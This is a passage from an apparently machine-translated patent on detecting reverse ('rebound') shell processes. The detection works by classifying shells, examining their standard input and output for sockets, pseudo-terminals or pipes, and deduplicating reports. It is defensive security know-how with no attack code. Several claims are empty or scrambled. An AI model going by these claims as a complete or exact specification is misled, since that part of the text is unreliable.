And if the process command of the process to be detected can be matched with the second preset regular expression, judging whether the process to be detected has one and only one effective network connection object, otherwise, if the process command of the process to be detected can not be matched with the second preset regular expression, judging that the process to be detected is not a rebound Shell process. And if the process to be detected has one and only one effective network connection object, judging whether the effective network connection object is generated by a fork function, otherwise, if the process to be detected does not satisfy the requirement and only one effective network connection object, judging that the process to be detected is not a rebound Shell process. And if the effective network connection object is generated by the fork function, the process to be detected is a rebound Shell process, otherwise, if the effective network connection object is not generated by the fork function, the process to be detected is not the rebound Shell process.

Step S14: and the feedback module 4 is used for judging whether the process to be detected is a rebound Shell process or not if the process to be detected is the rebound Shell process.

Specifically, a network connection object of a rebound Shell process is added into a cache; and when a rebound Shell process occurs newly, searching whether a network connection object completely identical to the newly occurring rebound Shell process exists in a cache, if so, considering that the newly occurring rebound Shell process is a repeated rebound Shell process, and if not, considering that the newly occurring rebound Shell process is a non-repeated rebound Shell process.

Step S15: and if the detected rebound Shell process is a repeated rebound Shell process, filtering the repeated rebound Shell process.

Specifically, if the newly appeared rebound Shell process is found to be a repeated rebound Shell process, the newly appeared rebound Shell process is filtered, and if the newly appeared rebound Shell process is found to be a non-repeated rebound Shell process, the newly appeared rebound Shell process is added into the cache. Meanwhile, when a new cache is added, all caches are traversed, and the cache which does not exist in the process corresponding to the network connection object is deleted.

Step S16: and if the detected rebound Shell process is a non-repeated rebound Shell process, reporting the non-repeated rebound Shell process.

Compared with the prior art, the method for detecting the rebound Shell process has the advantages that after the process to be detected is obtained, the process to be detected is classified and detected, common defects of existing rebound Shell process detection means are overcome, not only is a newly-built process detected, but also the existing process in the host is detected, meanwhile, various rebound Shell processes which may occur are summarized, various detection modes are combined timely, the rebound Shell process types are subdivided and detected, and compared with the existing detection method, the method for detecting the rebound Shell process is more perfect, higher in accuracy and lower in missing report rate, and the safety of the host can be better guaranteed.

In addition, an embodiment of the present invention further provides a device for detecting a rebound Shell process, where the device includes: a processor and a memory; the memory for storing one or more program instructions; the processor is configured to execute one or more program instructions to perform the steps of a method of detecting bouncing Shell processes as described in any one of the above.

In addition, an embodiment of the present invention further provides a computer-readable storage medium, on which a computer program is stored, where the computer program, when executed by a processor, implements the steps of the method for detecting a bouncing Shell process as described in any one of the above.

In an embodiment of the invention, the processor may be an integrated circuit chip having signal processing capability. The Processor may be a general purpose Processor, a Digital Signal Processor (DSP), an Application Specific Integrated Circuit (ASIC), a Field Programmable Gate Array (FPGA) or other programmable logic device, discrete Gate or transistor logic device, discrete hardware component.

The various methods, steps and logic blocks disclosed in the embodiments of the present invention may be implemented or performed. A general purpose processor may be a microprocessor or the processor may be any conventional processor or the like. The steps of the method disclosed in connection with the embodiments of the present invention may be directly implemented by a hardware decoding processor, or implemented by a combination of hardware and software modules in the decoding processor. The software modules may be located in ram, flash, rom, prom, or eprom, registers, etc. as is well known in the art. The processor reads the information in the storage medium and completes the steps of the method in combination with the hardware.

The storage medium may be a memory, for example, which may be volatile memory or nonvolatile memory, or may include both volatile and nonvolatile memory.

The nonvolatile Memory may be a Read-Only Memory (ROM), a Programmable ROM (PROM), an Erasable PROM (EPROM), an Electrically Erasable PROM (EEPROM), or a flash Memory.

The volatile Memory may be a Random Access Memory (RAM) which serves as an external cache. By way of example and not limitation, many forms of RAM are available, such as Static Random Access Memory (SRAM), Dynamic RAM (DRAM), Synchronous DRAM (SDRAM), Double Data Rate SDRAM (DDRSDRAM), Enhanced SDRAM (ESDRAM), SLDRAM (SLDRAM), and Direct Rambus RAM (DRRAM).

The storage media described in connection with the embodiments of the invention are intended to comprise, without being limited to, these and any other suitable types of memory.

Those skilled in the art will appreciate that the functionality described in the present invention may be implemented in a combination of hardware and software in one or more of the examples described above. When software is applied, the corresponding functionality may be stored on or transmitted over as one or more instructions or code on a computer-readable medium. Computer-readable media includes both computer storage media and communication media including any medium that facilitates transfer of a computer program from one place to another. A storage media may be any available media that can be accessed by a general purpose or special purpose computer.

Although the invention has been described in detail with respect to the general description and the specific embodiments, it will be apparent to those skilled in the art that modifications and improvements may be made based on the invention. Accordingly, such modifications and improvements are intended to be within the scope of the invention as claimed.

Claims

1. A method of detecting a bouncing Shell process, the method comprising:

scanning an existing process, taking the existing process as a process to be detected, acquiring related information of the existing process, monitoring triggering of an OP _ ADD event and an OP _ MOD event in real time, determining that a newly created process appears when the OP _ ADD event is triggered or the accumulated triggering times of the OP _ ADD event reach four times, taking the newly created process as the process to be detected, and acquiring related information of the newly created process;

judging whether a process execution path of the process to be detected can be matched with a first preset regular expression or not, and dividing the process to be detected into an interactive Shell process and a non-interactive Shell process;

respectively detecting whether the process to be detected is a rebound Shell process according to the classification category, specifically, when the process to be detected is an interactive Shell process and the standard input and output of the process to be detected are network connection objects, judging whether the network connection objects are realized through local sockets;

when the process to be detected is an interactive Shell process and the standard input and output of the process to be detected are both character devices, judging whether the standard input and output of the process to be detected are the same character device and whether the character device is a slave pseudo terminal;

when the process to be detected is an interactive Shell process and the standard input of the process to be detected is a pipeline connection object, judging that a parent process of the process to be detected has at least two child processes;

when the standard input and output of the process to be detected are conditions except the interactive Shell process or the process to be detected is a non-interactive Shell process, judging whether a process command of the process to be detected can be matched with a second preset regular expression;

if the process to be detected is a rebound Shell process, judging whether the process is a repeated rebound Shell process;

2. A method of detecting bouncing Shell processes as per claim 1,

the information related to the existing process or the newly created process includes: process name, process execution path, complete command to execute the process, process start time, process ID, parent process ID, process user information, parent process user information, and process standard input, output information.

3. A method of detecting bouncing Shell processes as claimed in claim 2, wherein classifying the processes to be detected comprises:

4. A method of detecting bouncing Shell processes as per claim 1,

5. The method for detecting the bouncing Shell process according to claim 4, wherein the step of respectively detecting whether the process to be detected is the bouncing Shell process according to the classification category comprises the steps of:

if the parent process of the process to be detected has and only has one effective network connection object, the process to be detected is a rebound Shell process, otherwise the process to be detected is not a rebound Shell process;

if the network connection object is not realized through a local socket, judging whether the standard input and output of the process to be detected is the same effective network connection object;

6. The method for detecting the bouncing Shell process according to claim 4, wherein whether the process to be detected is the bouncing Shell process is detected according to the classification category, further comprising:

if the parent process of the process to be detected has one and only one effective network connection object, judging whether a main pseudo terminal file descriptor exists in the first 20 file descriptors of the parent process of the process to be detected, otherwise, judging that the process to be detected is not a rebound Shell process;

7. The method for detecting the bouncing Shell process according to claim 4, wherein whether the process to be detected is the bouncing Shell process is detected according to the classification category, further comprising:

if the process to be detected does not meet the special judgment condition, judging whether the standard output of the process to be detected is a pipeline connection object;

if the number of the child processes of the parent process of the process to be detected is more than 1, judging whether the process to be detected has the standard output or the extended input of the child process, and redirecting the output to the standard input and the standard output of the process to be detected;

judging whether the network connection object s1 and the network connection object s2 are all valid network connection objects;

8. The method for detecting the bouncing Shell process according to claim 4, wherein whether the process to be detected is the bouncing Shell process is detected according to the classification category, further comprising:

if the process to be detected has one and only one effective network connection object, judging whether the effective network connection object is generated by a fork function, otherwise, the process to be detected is not a rebound Shell process;

9. A system for detecting bouncing Shell processes, the system comprising:

the acquiring module is used for scanning an existing process, taking the existing process as a process to be detected, acquiring relevant information of the existing process, monitoring triggering of an OP _ ADD event and the OP _ MOD event in real time, determining that a newly created process occurs when the OP _ ADD event is triggered or the accumulated triggering times of the OP _ ADD event reach four times, taking the newly created process as the process to be detected, and acquiring the relevant information of the newly created process;

the classification module is used for judging whether a process execution path of the process to be detected can be matched with a first preset regular expression or not and dividing the process to be detected into an interactive Shell process and a non-interactive Shell process;

the detection module is used for respectively detecting whether the process to be detected is a rebound Shell process according to the classification category, and particularly judging whether a network connection object is realized through a local socket when the process to be detected is an interactive Shell process and the standard input and output of the interactive Shell process are network connection objects;

10. An apparatus for detecting a bouncing Shell process, the apparatus comprising: a processor and a memory;

the memory is to store one or more program instructions;

the processor, configured to execute one or more program instructions to perform the steps of a method of detecting a bouncing Shell process according to any one of claims 1 to 8.